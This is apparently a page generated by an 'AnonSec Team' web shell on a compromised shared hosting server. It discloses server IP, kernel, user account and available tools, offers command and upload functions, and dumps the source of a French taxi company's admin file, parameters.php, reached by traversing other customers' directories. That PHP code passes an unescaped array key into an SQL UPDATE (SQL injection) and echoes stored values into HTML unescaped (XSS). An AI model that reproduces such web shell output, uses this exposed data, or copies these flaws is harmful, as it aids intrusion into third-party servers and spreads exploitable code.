AnonSec Team
Server IP : 10.111.40.2  /  Your IP : 216.73.217.145
Web Server : Apache
System : Linux webd002.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : comimage ( 586)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/comimage/referencements.comimage/../mailcemm/../taxiplus22.fr/archives/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/comimage/referencements.comimage/../mailcemm/../taxiplus22.fr/archives/admin/parameters.php
<?php
$formaction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']) > 0) {
  $formaction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
}

$userG = $_SESSION["MM_UserGroup"];

if (isset($_POST["cmdParam"])){
	// mis a jour des coordonne
	//	ajout de output=embed sur les urls si='il en existe pas encore
	if($_POST["txtplan"]!=""  && stristr($_POST["txtplan"],"output=embed")===FALSE){
		$postPlan = $_POST["txtplan"]."&amp;output=embed";
	}else{
		$postPlan = $_POST["txtplan"];
	}
	if($_POST["txtzoom"]!=""  && stristr($_POST["txtzoom"],"output=embed")===FALSE){
		$postZoom = $_POST["txtzoom"]."&amp;output=embed";
	}else{
		$postZoom = $_POST["txtzoom"];
	}
	
	if(!isset($_POST["nocoord"])){
		$sqlUpCoord = sprintf("UPDATE `".$prefix."coordonne` SET `nom` = %s, `adresse1` = %s, `adresse2` = %s, `cp_ville` = %s, `tel` = %s, `fax` = %s,`gsm` = %s, `siret` = %s, `mail` = %s, `plan` = %s, `zoom` = %s WHERE `idcoord` =1",
							getSQLValueString($_POST['txtname'], "text"),
							getSQLValueString($_POST['txtadr1'], "text"),
							getSQLValueString($_POST['txtadr2'], "text"),
							getSQLValueString($_POST['txtcp'], "text"),
							getSQLValueString($_POST['txttel'], "text"),
							getSQLValueString($_POST['txtfax'], "text"),
							getSQLValueString($_POST['txtgsm'], "text"),
							getSQLValueString($_POST['txtsiret'], "text"),
							getSQLValueString($_POST['txtmail'], "text"),
							getSQLValueString($postPlan, "text"),
							getSQLValueString($postZoom, "text"));
		$con->createQuery($sqlUpCoord, $databasename);
	}else{
		$sqlAddCoord = sprintf("INSERT INTO `".$prefix."coordonne` VALUES(NULL, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
										getSQLValueString($_POST['txtname'], "text"),
										getSQLValueString($_POST['txtadr1'], "text"),
										getSQLValueString($_POST['txtadr2'], "text"),
										getSQLValueString($_POST['txtcp'], "text"),
										getSQLValueString($_POST['txttel'], "text"),
										getSQLValueString($_POST['txtfax'], "text"),
										getSQLValueString($_POST['txtgsm'], "text"),
										getSQLValueString($_POST['txtsiret'], "text"),
										getSQLValueString($_POST['txtmail'], "text"),
										getSQLValueString($postPlan, "text"),
										getSQLValueString($postZoom, "text"));
		$con->createQuery($sqlAddCoord, $databasename);								
	}
	
	
	//	mis a jour des expression
	if(isset($_POST["noexpr"])){
		if(isset($_POST["txtexpr"])){
			foreach(array_keys($_POST["txtexpr"]) as $exprKey){
				$sqlUpExpr = sprintf("UPDATE `".$prefix."expression` SET `expression` = %s WHERE `idexpression` = $exprKey",
									getSQLValueString($_POST['txtexpr'][$exprKey], "text"));
				$con->createQuery($sqlUpExpr, $databasename);
			}
		}
	}
	
	//	insertion des nouveaux expressions
	if(isset($_POST["txtexpradd"])){
		$sqlExprAdd = "INSERT INTO `".$prefix."expression`(`expression`) VALUES";
		$sqlTmp = "";
		foreach($_POST["txtexpradd"] as $exp){
			$sqlTmp .= sprintf("(%s),",getSQLValueString($exp, "text"));
		}
		$sqlTmp = substr($sqlTmp,0 , strlen($sqlTmp)-1);
		$sqlExprAdd .= $sqlTmp;
		$con->createQuery($sqlExprAdd, $databasename);
	}
	
}


//include 'header.php';
?>
<script language="javascript" src="../includes/jquery-1.2.2.js"></script>
<script language="javascript">
	function addExpr(){
		$("#expression").append("<input type='text' name='txtexpradd[]' /><br />");
		
	}
</script>

	<h3>Coordonn&eacute;es du Site</h3>
  <?php
		$sqlCoord = "SELECT * FROM `".$prefix."coordonne`";
		$rsCoord = $con->createResultSet($sqlCoord, $databasename);
		if($rsCoord->getNumberRows() > 0){
			$coord = $rsCoord->current();
	?>
  <form action="<?php echo $formaction; ?>" method="post" name="frmparam">
	<div id="coords">
		<label>Template utilis&eacute;</label>
		<input readonly="readonly" type="text" name="txttemplateused" value="<?php echo $coord["template"]; ?>" /><br />
		<label>Nom de l'agence </label>
		<input type="text" name="txtname" value="<?php echo $coord["nom"]; ?>" /><br />
		<label>Adresse legal 1 </label>
		<input type="text" name="txtadr1" value="<?php echo $coord["adresse1"]; ?>" /><br />
		<label>Adresse legal 2 </label>
		<input type="text" name="txtadr2" value="<?php echo $coord["adresse2"]; ?>" /><br />
		<label>CP Ville </label>
		<input type="text" name="txtcp" value="<?php echo $coord["cp_ville"]; ?>" /><br />
		<label>T&eacute;l</label>
		<input type="text" name="txttel" value="<?php echo $coord["tel"]; ?>" /><br />
		<label>Fax</label>
		<input type="text" name="txtfax" value="<?php echo $coord["fax"]; ?>" /><br />
		<label>Portable</label>
		<input type="text" name="txtgsm" value="<?php echo $coord["gsm"]; ?>" /><br />
		<label>Siret</label>
		<input type="text" name="txtsiret" value="<?php echo $coord["siret"]; ?>" /><br />
		<label>E-mail</label>
		<input type="text" name="txtmail" value="<?php echo $coord["mail"]; ?>" /><br />
	</div>
	<?php
	if($_SESSION["MM_UserGroup"]=="administrateur"){
	//if(1){
	?>
	<h3>Localisation</h3>
	<div id="localisation">
		<label>Plan</label>
		<input type="text" name="txtplan" value="<?php echo $coord["plan"]; ?>" /><a href="<?php echo $coord["plan"]; ?>" target="_blank">apercu</a><br />
		<label>Zoom du plan</label>
		<input type="text" name="txtzoom" value="<?php echo $coord["zoom"]; ?>" /><a href="<?php echo $coord["zoom"]; ?>" target="_blank">apercu</a><br />
		<div id="planGMaps">
		
		</div>
	</div>
	<?php
	}else
	{
	?>
	<input type="hidden" name="txtplan" value="<?php echo $coord["plan"]; ?>" />
	<input type="hidden" name="txtzoom" value="<?php echo $coord["zoom"]; ?>" />
	<?php
	}
	?>
  <?php
  	}else{
	?>
  		<div id="coords">
		<input type="hidden" name="nocoord" value="1" />
		<label>Nom de l'agence </label>
		<input type="text" name="txtname" /><br />
		<label>Adresse legal 1 </label>
		<input type="text" name="txtadr1" /><br />
		<label>Adresse legal 2 </label>
		<input type="text" name="txtadr2" /><br />
		<label>CP Ville </label>
		<input type="text" name="txtcp" /><br />
		<label>T&eacute;l</label>
		<input type="text" name="txttel" /><br />
		<label>Fax</label>
		<input type="text" name="txtfax" /><br />
		<label>Siret</label>
		<input type="text" name="txtsiret" /><br />
		<label>E-mail</label>
		<input type="text" name="txtmail" /><br />
		
		<h3>Horaire</h3>
		<textarea name="txthorraire"></textarea><br />
		
	</div>
	<h3>Localisation</h3>
	<div id="localisation">
		<label>Plan</label>
		<input type="text" name="txtplan" /><br />
		<label>Zoom du plan</label>
		<input type="text" name="txtzoom" /><br />

	</div>

  <?php
  	}
	if($_SESSION["MM_UserGroup"]=="administrateur")
	{
	?>
	<h3>Les expressions </h3>
	[ <a href="#" onclick="addExpr()">Ajouter des Expressions</a> ]<br /><br />
	<div id="expression">
	<?php
		$sqlExpr = "SELECT * FROM ".$prefix."expression";
		$rsExpr = $con->createResultSet($sqlExpr, $databasename);
		if($rsExpr->getNumberRows() > 0){
			foreach($rsExpr as $expr){
				echo '<input type="text" name="txtexpr['.$expr["idexpression"].']" value="'.$expr["expression"].'" /><br />';
			}
		}
		//else{
			echo '<input type="hidden" name="noexpr" value="1" />';
		//} 
	}
	?>
	
	<input type="submit" value="Valider les informations" class="centreinput" name="cmdParam" />
	</div>

	</form>

<?php
//include 'footer.php';
?>

AnonSec - 2021